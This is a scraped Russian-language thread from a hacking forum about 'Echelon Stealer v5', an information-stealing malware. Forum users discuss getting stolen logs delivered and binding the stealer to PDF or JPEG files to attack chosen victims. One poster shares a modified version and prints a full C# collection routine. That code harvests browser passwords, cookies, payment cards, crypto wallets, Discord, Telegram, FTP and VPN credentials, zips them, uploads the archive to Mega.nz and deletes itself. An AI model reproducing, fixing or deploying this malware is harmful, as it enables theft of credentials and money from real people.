-
XSS.stack #1 – первый литературный журнал от юзеров форума
Echelon Stealer v5 master Стилер с отправкой лога в телеграм бота
- Автор темы Gruzin733
- Дата начала
- Автор темы
- Добавить закладку
- #82
А ты можешь поправить что бы нет был не 4.6
Так он и без поправок просто 4.0
что-то всеравно не шлет, где я уже ток не тестил, может в моем vb что-то не установлено и оно хреново компилирует его?)
Подскажите как лучше склеить, нужно с пдф и jpeg, для разовой атаки на одну свинью.
И главный вопрос все браузеры стилит?
И главный вопрос все браузеры стилит?
Последнее редактирование:
Доброго
C РУ-СНГ ip тоже отправляет, а то уже какие только прокси не брал, не в какую, как только даешь на тестовой машине бурж ip сразу прилетает лог.
Хотя архивы собирает, тупо просто не отправляет их
______________________________
Подскажите знающие где косяк. Уже столько прокси купил для него(http/https), со всех сайт телеги пашет. А вот отстука нет, стиллер тупо висит в процесах, только меняешь ip на любую страну гейропы, отстук сразу происходит.
Может конечно прокси не поддерживают post запросы,но такие редко встречал, аль подскажите где купить качественные.
__________________________
как я понимаю это дело не в проксях, много перепробывал. Он вобще стучит по СНГ(ру)?, надо для точечной атаки использовать, на пару свиней)
Последнее редактирование:
- Автор темы
- Добавить закладку
- #87
В ру телега блок. Прокси бугра лепи
Да уже половину стран гейропы + юсу попробывал, исход все тот же.
______
Upg: Сегодня еще пять прокси взял не Рашки, эффект тот же лог в телегу не прелетает, у кого получилось подскажите, что нужно подправить!
Последнее редактирование:
Viktor3852, респект все шлет теперь
Разобрался что с win7 шлет, с вин10 создает папку и архив, потом они удалются как и сам исполняемый файл стиллер, но в тг ничего не приходит подскажите куда копать?
Разобрался что с win7 шлет, с вин10 создает папку и архив, потом они удалются как и сам исполняемый файл стиллер, но в тг ничего не приходит подскажите куда копать?
Последнее редактирование:
Где скачать редлайн?
Привет всем. Выкладываю новую версию с моими изменениями. Net framework все так же четвертый.
Теперь архив с логами отправляется на облако Mega.nz, что намного надежнее и эффективнее чем телеграмм, отстук 1000% на любой винде.
Логин и пароль от меги указывается в Program.cs.
Информация, которая отправлялась в телеграме вместе с архивом теперь лежит в файле InfoHERE.txt внутри самого архива.
Также удален весь ненужный код.
Скачивайте, пользуйтесь, пишите если есть баги.
ССЫЛКА
И также скан исполняемого файла стиллера:
Теперь архив с логами отправляется на облако Mega.nz, что намного надежнее и эффективнее чем телеграмм, отстук 1000% на любой винде.
Логин и пароль от меги указывается в Program.cs.
Информация, которая отправлялась в телеграме вместе с архивом теперь лежит в файле InfoHERE.txt внутри самого архива.
Также удален весь ненужный код.
Скачивайте, пользуйтесь, пишите если есть баги.
ССЫЛКА
И также скан исполняемого файла стиллера:
Скорее всего проблема с твоей стороны, так как у меня на двух компьютерах работает, но попробуй заменить код в Collection.cs (в папке Stealer) на этот:такая лабуда после компиляции и запуска
C#:
using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using Echelon.Global;
using Ionic.Zip;
using Ionic.Zlib;
namespace Echelon
{
public static class Collection
{
[STAThread]
public static void GetChromium()
{
try
{
Chromium.GetCards(Help.Cards);
Chromium.GetCookies(Help.Cookies);
Chromium.GetPasswords(Help.Passwords);
Chromium.GetAutofills(Help.Autofills);
Chromium.GetDownloads(Help.Downloads);
Chromium.GetHistory(Help.History);
Chromium.GetPasswordsOpera(Help.Passwords);
Chromium.GetCookiesOpera(Help.Cookies);
}
catch { }
}
public static void GetGecko()
{
try
{
Steal.Cookies();
Steal.Passwords();
}
catch { }
}
public static void GetCollection()
{
try
{
// Создаем временные директории для сбора лога
Directory.CreateDirectory(Help.collectionDir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
}
catch { }
var t0 = new Task[1] { new Task(() => Files.GetFiles(Help.collectionDir))};
var t1 = new Task[1] { new Task(() => GetChromium())};
var t2 = new Task[1] { new Task(() => GetGecko())};
var t3 = new Task[1] { new Task(() => Edge.GetEdge(Help.Passwords))};
var t4 = new Task[1] { new Task(() => Outlook.GrabOutlook(Help.collectionDir))};
var t5 = new Task[1] { new Task(() => FileZilla.GetFileZilla(Help.collectionDir))};
var t6 = new Task[1] { new Task(() => TotalCommander.GetTotalCommander(Help.collectionDir))};
var t7 = new Task[1] { new Task(() => ProtonVPN.GetProtonVPN(Help.collectionDir))};
var t8 = new Task[1] { new Task(() => OpenVPN.GetOpenVPN(Help.collectionDir))};
var t9 = new Task[1] { new Task(() => NordVPN.GetNordVPN(Help.collectionDir))};
var t10 = new Task[1] { new Task(() => Telegram.GetTelegram(Help.collectionDir))};
var t11 = new Task[1] { new Task(() => Discord.GetDiscord(Help.collectionDir))};
var t12 = new Task[1] { new Task(() => Wallets.GetWallets(Help.collectionDir))};
var t13 = new Task[1] { new Task(() => Systemsinfo.GetSystemsData(Help.collectionDir))};
var t14 = new Task[1] { new Task(() => DomainDetect.GetDomainDetect(Help.Browsers))};
try
{
new Thread(() => { foreach (var t in t0) t.Start(); }).Start();
new Thread(() => { foreach (var t in t1) t.Start(); }).Start();
new Thread(() => { foreach (var t in t2) t.Start(); }).Start();
new Thread(() => { foreach (var t in t3) t.Start(); }).Start();
new Thread(() => { foreach (var t in t4) t.Start(); }).Start();
new Thread(() => { foreach (var t in t5) t.Start(); }).Start();
new Thread(() => { foreach (var t in t6) t.Start(); }).Start();
new Thread(() => { foreach (var t in t7) t.Start(); }).Start();
new Thread(() => { foreach (var t in t8) t.Start(); }).Start();
new Thread(() => { foreach (var t in t9) t.Start(); }).Start();
new Thread(() => { foreach (var t in t10) t.Start(); }).Start();
new Thread(() => { foreach (var t in t11) t.Start(); }).Start();
new Thread(() => { foreach (var t in t12) t.Start(); }).Start();
new Thread(() => { foreach (var t in t13) t.Start(); }).Start();
new Thread(() => { foreach (var t in t14) t.Start(); }).Start();
Task.WaitAll(t0);
Task.WaitAll(t1);
Task.WaitAll(t2);
Task.WaitAll(t3);
Task.WaitAll(t4);
Task.WaitAll(t5);
Task.WaitAll(t6);
Task.WaitAll(t7);
Task.WaitAll(t8);
Task.WaitAll(t9);
Task.WaitAll(t10);
Task.WaitAll(t11);
Task.WaitAll(t12);
Task.WaitAll(t13);
Task.WaitAll(t14);
}
catch { }
var data = Program.buildversion +
"\n? " + Help.machineName + "/" + Help.userName +
"\n? IP: " + Help.IP + Help.Country() +
"\n? Browsers Data" +
"\n ∟?" + (Chromium.Passwords + Edge.count + Steal.count) +
"\n ∟?" + (Chromium.Cookies + Steal.count_cookies) +
"\n ∟?" + Chromium.History +
"\n ∟?" + Chromium.Autofills +
"\n ∟?" + Chromium.CC +
"\n? Wallets: " + (Wallets.count > 0 ? "✅" : "❌") +
(Electrum.count > 0 ? " Electrum" : "") +
(Armory.count > 0 ? " Armory" : "") +
(AtomicWallet.count > 0 ? " Atomic" : "") +
(BitcoinCore.count > 0 ? " BitcoinCore" : "") +
(Bytecoin.count > 0 ? " Bytecoin" : "") +
(DashCore.count > 0 ? " DashCore" : "") +
(Ethereum.count > 0 ? " Ethereum" : "") +
(Exodus.count > 0 ? " Exodus" : "") +
(LitecoinCore.count > 0 ? " LitecoinCore" : "") +
(Monero.count > 0 ? " Monero" : "") +
(Zcash.count > 0 ? " Zcash" : "") +
(Jaxx.count > 0 ? " Jaxx" : "") +
"\n? FileGrabber: " + Files.count + //Работает
"\n? Discord: " + (Discord.count > 0 ? "✅" : "❌") + //Работает
"\n✈️ Telegram: " + (Telegram.count > 0 ? "✅" : "❌") + //Работает
"\n? Jabber: " + (Startjabbers.count + Pidgin.PidginCount > 0 ? "✅" : "❌") +
(Pidgin.PidginCount > 0 ? " Pidgin (" + Pidgin.PidginAkks + ")" : "") +
(Startjabbers.count > 0 ? " Psi" : "") + //Работает
"\n? FTP" +
"\n ∟ FileZilla: " + (FileZilla.count > 0 ? "✅" + " (" + FileZilla.count + ")" : "❌") + //Работает
"\n ∟ TotalCmd: " + (TotalCommander.count > 0 ? "✅" : "❌") + //Работает
"\n? VPN" +
"\n ∟ NordVPN: " + (NordVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ OpenVPN: " + (OpenVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ ProtonVPN: " + (ProtonVPN.count > 0 ? "✅" : "❌") + //Работает
"\n? HWID: " + Help.HWID + //Работает
"\n⚙️ " + Systemsinfo.GetOSInformation() +
"\n? " + File.ReadAllText(Help.Browsers + "\\DomainDetect.txt");
File.WriteAllText(Help.collectionDir + "\\" + "InfoHERE.txt", data);
// Пакуем в апхив с паролем
var zipArchive = Help.dir + "\\" + Help.dateLog + "_" + Help.userName + "_" + Help.machineName + Help.CountryCOde() + ".zip";
using (var zip = new ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку
{
zip.ParallelDeflateThreshold = -1;
zip.UseZip64WhenSaving = Zip64Option.Always;
zip.CompressionLevel = CompressionLevel.Default; // Задаем степень сжатия
zip.Password = Program.passwordzip; // Задаём пароль
zip.AddDirectory(Help.collectionDir); // Кладем в архив содержимое папки с логом
try { zip.Save(zipArchive); }
catch
{
zipArchive = Help.dir + "\\" + Help.dateLog + "_" + Help.HWID + Help.CountryCOde() + ".zip";
zip.Save(zipArchive);
}
}
MegaSend.Send(zipArchive); //отправка в мегу
Clean.GetClean(); // удаление папки со стиллером
}
}
}Скрытый контент для пользователей: .
Прям вот красавчег, слов нет, ещё вопросик, как по поводу клипера обстоят дела, да и можно ли боту отправлять какие-то команды, тип перестилить, или ещё что ? ?
За рано обрадовался, скажите так должно быть при запуске? Тупо окно такое, да и ничего не шлёт на Мегу
Не многовато файлов, нельзя сделать так что бы всё в один ехе компилило ?
Не многовато файлов, нельзя сделать так что бы всё в один ехе компилило ?
да софт мертвый какой то, рили опять где то склеили, либо что то другое
Блин, а я было подумал чёт годное сделали, тут никто не смотрит или нет склеек и всякой хрени в том что публикуют ?
склеивают только мрази..Блин, а я было подумал чёт годное сделали, тут никто не смотрит или нет склеек и всякой хрени в том что публикуют ?